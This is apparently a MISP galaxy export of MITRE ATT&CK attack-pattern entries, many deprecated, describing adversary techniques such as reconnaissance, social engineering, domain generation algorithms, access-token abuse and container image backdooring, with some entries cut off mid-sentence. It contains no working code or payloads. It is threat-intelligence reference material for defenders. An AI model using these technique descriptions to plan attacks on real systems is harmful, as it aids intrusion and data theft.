The tag is: *misp-galaxy:mitre-attack-pattern*="Enumerate client configurations - T1262"

### Table 3400. Table References

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### Identify business relationships - T1272

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1272).

Business relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: *misp-galaxy:mitre-attack-pattern*="Identify business relationships - T1272"
Identify business relationships - T1272 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283" with estimative-language:likelihood-probability="almost-certain"

**Table 3401. Table References**

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**Determine physical locations - T1282**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1282).

Physical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)

The tag is: `misp-galaxy:mitre-attack-pattern="Determine physical locations - T1282"`

**Table 3402. Table References**

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**Test signature detection - T1292**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1292).

An adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don’t publicly publish results or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)

The tag is: `misp-galaxy:mitre-attack-pattern="Test signature detection - T1292"`

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**Access Contact List - T1432**

An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files
containing contact list data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432"

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<td><a href="https://attack.mitre.org/techniques/T1432">https://attack.mitre.org/techniques/T1432</a></td>
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**Network Service Scanning - T1423**

Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device’s access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1423"

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<td><a href="https://attack.mitre.org/techniques/T1423">https://attack.mitre.org/techniques/T1423</a></td>
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**Evade Analysis Environment - T1523**

Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. Adversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr 2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop Evade Analysis January 2019) Adversaries may access android.os.SystemProperties via Java reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)

The tag is: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523"

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<td><a href="https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html">https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html</a></td>
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</table>
**Conduct passive scanning - T1253**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1253).

Passive scanning is the act of looking at existing network traffic in order to identify information about the communications system. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper)

The tag is: `misp-galaxy:mitre-attack-pattern="Conduct passive scanning - T1253"`

**Table 3407. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1253">https://attack.mitre.org/techniques/T1253</a></td>
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</table>

**Fast Flux DNS - T1325**

This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).

A technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)

The tag is: `misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1325"`

**Table 3408. Table References**

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**Domain registration hijacking - T1326**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content
Domain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)

The tag is: misp-galaxy:mitre-attack-pattern="Domain registration hijacking - T1326"

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**Mine social media - T1273**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1273).

An adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Mine social media - T1273"

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<td><a href="https://attack.mitre.org/techniques/T1273">https://attack.mitre.org/techniques/T1273</a></td>
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**Buy domain name - T1328**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1328).

Domain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)

The tag is: misp-galaxy:mitre-attack-pattern="Buy domain name - T1328"

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Identify business relationships - T1283

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1283).

Business relationship information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: 11StepsAttackers)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283"

Identify business relationships - T1283 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272" with estimative-language:likelihood-probability="almost-certain"

Table 3412. Table References

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<td><a href="https://attack.mitre.org/techniques/T1283">https://attack.mitre.org/techniques/T1283</a></td>
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Fake Developer Accounts - T1442

An adversary could use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. For example, Oberheide and Miller describe use of this technique in (Citation: Oberheide-Bouncer).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Fake Developer Accounts - T1442"

Fake Developer Accounts - T1442 has relationships with:


Table 3413. Table References

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Conduct active scanning - T1254

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1254).

Active scanning is the act of sending transmissions to end nodes, and analyzing the responses, in
order to identify information about the communications system. (Citation: RSA-APTRecon)

The tag is: *misp-galaxy:mitre-attack-pattern="Conduct active scanning - T1254"*

**System Information Discovery - T1426**

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.

On Android, much of this information is programmatically accessible to applications through the android.os.Build class. (Citation: Android-Build)

On iOS, techniques exist for applications to programmatically access this information. (Citation: StackOverflow-iOSVersion)

The tag is: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"*

**Identify supply chains - T1246**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1246).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)

The tag is: *misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246"*

Identify supply chains - T1246 has relationships with:

- related-to: *misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265"* with estimative-language:likelihood-probability="almost-certain"

Table 3414. Table References

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Table 3415. Table References

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<td><a href="http://stackoverflow.com/questions/7848766/how-can-we-programmatically-detect-which-ios-version-is-device-running-on">http://stackoverflow.com/questions/7848766/how-can-we-programmatically-detect-which-ios-version-is-device-running-on</a></td>
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Identify supply chains - T1246 has relationships with:

- related-to: *misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276"* with estimative-language:likelihood-probability="almost-certain*
Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003). Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP. The Windows utility `Nltest` is known to be used by adversaries to enumerate domain trusts.

The tag is: `misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"`

Adversaries may attempt to exploit enterprise servers, workstations, or other resources over the network. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).

The tag is: `misp-galaxy:mitre-attack-pattern="Exploit Enterprise Resources - T1428"`
Conduct social engineering - T1249

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1249).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: `misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249"

Conduct social engineering - T1249 has relationships with:

- related-to: `misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268"` with estimative-language:likelihood-probability="almost-certain"
- related-to: `misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279"` with estimative-language:likelihood-probability="almost-certain"

Stored Data Manipulation - T1492

Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: `misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492"

Stored Data Manipulation - T1492 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001"` with
Implant Internal Image - T1525

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525"

Cloud Service Discovery - T1526

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources
and policy definitions, and their relationships that are accessible by an identity. (Citation: Azure - Resource Manager API) (Citation: Azure AD Graph API)

Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services. (Citation: Azure - Stormspotter) (Citation: GitHub Pacu)

The tag is: `misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526"`

Table 3422. Table References

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<td><a href="https://github.com/RhinoSecurityLabs/pacu">https://github.com/RhinoSecurityLabs/pacu</a></td>
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**Identify supply chains - T1265**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1265).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: `misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265"

Identify supply chains - T1265 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276" with estimative-language:likelihood-probability="almost-certain"
- related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246" with estimative-language:likelihood-probability="almost-certain"

Table 3423. Table References

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<td><a href="https://attack.mitre.org/techniques/T1265">https://attack.mitre.org/techniques/T1265</a></td>
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**Application Access Token - T1527**

Adversaries may use application access tokens to bypass the typical authentication process and
access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS). (Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application. (Citation: okta)

For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a “refresh” token enabling background access is awarded. (Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration. (Citation: Staaldraad Phishing with OAuth 2017)

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1527"

Application Access Token - T1527 has relationships with:


Table 3424. Table References

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<td><a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens">https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens</a></td>
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Determine firmware version - T1258

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1258).
Firmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)

The tag is: misp-galaxy:mitre-attack-pattern="Determine firmware version - T1258"

**Table 3425. Table References**

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**Identify supply chains - T1276**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1276).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit organizational relationships. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276"

Identify supply chains - T1276 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246" with estimative-language:likelihood-probability="almost-certain"
- related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265" with estimative-language:likelihood-probability="almost-certain"

**Table 3426. Table References**

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**Conduct social engineering - T1268**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1268).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268"

Conduct social engineering - T1268 has relationships with:
Assess targeting options - T1296

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1296).

An adversary may assess a target's operational security (OPSEC) practices in order to identify targeting options. A target may share different information in different settings or be more or less cautious in different environments. (Citation: Scasny2015) (Citation: EverstineAirStrikes) (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)

The tag is: `misp-galaxy:mitre-attack-pattern="Assess targeting options - T1296"`

Analyze data collected - T1287

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1287).

An adversary will assess collected information such as software/hardware versions, vulnerabilities, patch level, etc. They will analyze technical scanning results to identify weaknesses in the confirmation or architecture. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)

The tag is: `misp-galaxy:mitre-attack-pattern="Analyze data collected - T1287"`

Conduct social engineering - T1279

This object is deprecated as its content has been merged into the enterprise domain. Please see the
Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279"

Conduct social engineering - T1279 has relationships with:

- related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268" with estimative-language:likelihood-probability="almost-certain"
- related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249" with estimative-language:likelihood-probability="almost-certain"

### Access Call Log - T1433

On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.

On iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433"

### Create backup infrastructure - T1339

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1339).

Backup infrastructure allows an adversary to recover from environmental and system failures. It also facilitates recovery or movement to other infrastructure if the primary infrastructure is discovered or otherwise is no longer viable. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Create backup infrastructure - T1339"
Remotely Install Application - T1443

An adversary with control of a target's Google account can use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account as described in (Citation: Oberheide-RemoteInstall), (Citation: Konoth). However, only applications that are available for download through the Google Play Store can be remotely installed using this technique.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted or known insecure or malicious apps on devices.

Platforms: Android

The tag is: `misp-galaxy:mitre-attack-pattern="Remotely Install Application - T1443"`

Remotely Install Application - T1443 has relationships with:


Abuse Accessibility Features - T1453

This technique has been deprecated. Please use [Input Capture](https://attack.mitre.org/techniques/T1417), [Input Injection](https://attack.mitre.org/techniques/T1516), and [Input Prompt](https://attack.mitre.org/techniques/T1411) where appropriate.

A malicious app could abuse Android’s accessibility features to capture sensitive data or perform other malicious actions.(Citation: Skycurer-Accessibility)

Adversaries may abuse accessibility features on Android to emulate a user's clicks, for example to steal money from a user's bank account.(Citation: android-trojan-steals-paypal-2fa)(Citation: banking-trojans-google-play)

Adversaries may abuse accessibility features on Android devices to evade defenses by repeatedly clicking the "Back" button when a targeted app manager or mobile security app is launched, or when strings suggesting uninstallation are detected in the foreground. This effectively prevents the malicious application from being uninstalled.(Citation: android-trojan-steals-paypal-2fa)

The tag is: `misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453"`
Access Calendar Entries - T1435

An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435"

Create custom payloads - T1345

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1345).

A payload is the part of the malware which performs a malicious action. The adversary may create custom payloads when none exist with the needed capability or when targeting a specific environment. (Citation: APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Create custom payloads - T1345"

Manipulate Device Communication - T1463

If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to man-in-the-
middle attacks (Citation: FireEye-SSL).

The tag is: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463"

Table 3437. Table References

Links

https://attack.mitre.org/techniques/T1463

Commonly Used Port - T1436

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

They may use commonly open ports such as

- TCP:80 (HTTP)
- TCP:443 (HTTPS)
- TCP:25 (SMTP)
- TCP/UDP:53 (DNS)

They may use the protocol associated with the port or a completely different protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436"

Table 3438. Table References

Links

https://attack.mitre.org/techniques/T1436

Domain Generation Algorithms - T1483

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

The tag is: `misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1483"`

Domain Generation Algorithms - T1483 has relationships with:


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### Alternate Network Mediums - T1438

Adversaries can communicate using cellular networks rather than enterprise Wi-Fi in order to bypass enterprise network monitoring systems. Adversaries may also communicate using other non-Internet Protocol mediums such as SMS, NFC, or Bluetooth to bypass network monitoring systems.

The tag is: `misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438"`

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Transmitted Data Manipulation - T1493

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. (Citation: FireEye APT38 Oct 2018) (Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493"

Transmitted Data Manipulation - T1493 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002"

  with estimative-language:likelihood-probability="almost-certain"

Table 3441. Table References

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Subvert Trust Controls - T1553

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.

Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls. (Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
The tag is: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1553"

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Revert Cloud Instance - T1536

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be easily facilitated using restoration from VM or data storage snapshots through the cloud management dashboard. Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the latter types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1536"

Revert Cloud Instance - T1536 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1578.004" with estimative-language:likelihood-probability="almost-certain"

Table 3443. Table References

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Test callback functionality - T1356

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1356).

Callbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached.
Cloud Service Dashboard - T1538

An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports. (Citation: Google Command Center Dashboard)

Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.

Disseminate removable media - T1379

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE] matrix for its replacement. The prior content of this page has been preserved [here].

Removable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)
Spearphishing for Information - T1397

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1397).

Spearphishing for information is a specific variant of spearphishing. Spearphishing for information is different from other forms of spearphishing in that it doesn’t leverage malicious code. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials, without involving malicious code. Spearphishing for information frequently involves masquerading as a source with a reason to collect information (such as a system administrator or a bank) and providing a user with a website link to visit. The given website often closely resembles a legitimate site in appearance and has a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Spearphishing for information may also try to obtain information directly through the exchange of emails, instant messengers or other electronic conversation means. (Citation: ATTACKREF GRIZZLY STEPPE JAR)

The tag is: *misp-galaxy:mitre-attack-pattern=*"Spearphishing for Information - T1397"

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Remote File Copy - T1544

Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or onto the victim’s device.

The tag is: *misp-galaxy:mitre-attack-pattern=*"Remote File Copy - T1544"

Table 3448. Table References

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Malicious SMS Message - T1454

An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device. For example, Mulliner and Miller demonstrated such an attack against the iPhone in 2009 as described in (Citation: Forbes-iPhoneSMS).
An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser.

As described by SRLabs in (Citation: SRLabs-SIMCard), vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious SMS Message - T1454"

Table 3449. Table References

